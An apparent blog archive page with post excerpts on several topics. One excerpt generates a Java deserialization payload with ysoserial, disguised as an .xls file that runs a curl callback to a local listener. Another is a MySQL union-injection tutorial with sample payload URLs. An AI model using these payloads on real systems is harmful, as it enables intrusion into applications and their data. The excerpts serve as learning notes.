作者归档:梧桐雨

使用ysoserial生成反序列化payload文件

某次对业务进行审计发现存在一处反序列化漏洞(该漏洞形成的原因是会对上传文件引擎进行解析)

省去敏感部分,只记录一下过程。

可以直接通过github下载ysoserial-0.0.7-SNAPSHOT-all.jar

ysoserial-0.0.7-SNAPSHOT-all.jar支持多个生成payload的选项

具体适配哪个payload,还需要查看源码(如果有的情况下,没有源码的情况下只能逐个去尝试)

例如:

对应的是:

commons-beanutils:1.9.2, commons-collections:3.1, commons-logging:1.2

这块可以通过配置找到:(一般在pom.xml或者libraries.gradle文件配置里)

生成payload文件命令语法

java -jar ysoserial-0.0.7-SNAPSHOT-all.jar CommonsBeanutils1 “curl http://127.0.0.1:4444” > java.xls

继续阅读

隐藏的优惠

经常用支付宝充值羊城通,但是无意之中点了取消,发现竟然还有隐藏的红包

付款方式选择支付宝,这个时候点击左上角的X

此时再点击继续付款,红包就使用了

可能类似隐藏的红包还有很多,这就像在程序里头的暗桩。

珂技系列之一篇就够了——mysql注入

freebuf看到的,总结挺全,备份留着方便自己找吧

原文:https://www.freebuf.com/articles/web/261524.html

因为以前被盗过文,所以想了想干脆都发到这里,免得再被盗。

原文最初是发给公司同事看的,后来首发于本人公众号。

一、 Sql注入是什么?如何产生的?危害有哪些?

现在的web大多是前后端分离,在固定前端页面上,通过不同参数去调用数据库的内容而显示不一样内容。这种情况下传入恶意参数,通过拼接在sql语句上,导致攻击者可以操作数据库,获得敏感数据或者直接命令执行,危害极大。
最常见的sql注入。

http://127.0.0.1/news.php?id=1
select * from news where id = $id;
http://127.0.0.1/news.php?id=1 and 1=1
select * from news where id = 1 and 1=1

二、 SQL注入有多少种?

从回显内容上来看,SQL注入只分为联合注入,报错注入,盲注,堆叠注入。

1,联合注入

在联合注入中是使用了union select联合查询,通常用来拼接在where后面,如下。

http://127.0.0.1/news.php?id=1 http://127.0.0.1/news.php?id=1 order by 4 http://127.0.0.1/news.php?id=-1 union select 1,2,3,4 
http://127.0.0.1/news.php?id=-1 union select user(),2,3,4

sql语句为。

select * from news where id = $id; 
select * from news where id = 1 order by 4
select * from news where id = -1 union select 1,2,3,4
select * from news where id = -1 union select user(),2,3,4
继续阅读

win7安装sysmon报错

sysmon是一款微软自带的应用事件分析工具,win10都可以正常安装,虚拟机安装win7后,裸机安装提示:error getting the evt dll (wevtapi.dll): 87

网上搜了下,按照这个办法可以解决问题正常安装。

需要安装两个补丁,分别为

一共需要两个补丁,分别是KB2533623和KB3033929。

下载两个补丁回来以后,安装命令如下:

expand -f: *c:\buding\windows6.1-kb2533623-x64.msu c:\buding\

释放完文件以后通过dism.exe进行执行(此步骤需要管理员权限运行cmd)

dism.exe /online /add-package /packagepath:c:\buding\windows6.1-kb2533623-x64.cab

安装完以后需要重启电脑,默认y即可,重启完成后补丁生效。

KB3033929 安装方式同理。

最后win7安装成功截图:

查看事件均已有记录

godaddy域名续费优惠

一转眼,博客以及域名也经历了十年的时光。差点连我都快遗忘域名过期了,本着记录原则,将godaddy域名续费过程稍作记录一下。

又续了5年。

昨天很神奇的是,续费我的域名,一年竟然要2800.

不得已只能上网找是否有其他因素影响,通过知乎得知了,godaddy是有小程序的,而godaddy账户体系也是可以通过扫描微信二维码进行绑定,后续登录godaddy扫描微信二维码即可登录了。非常方便。

继续阅读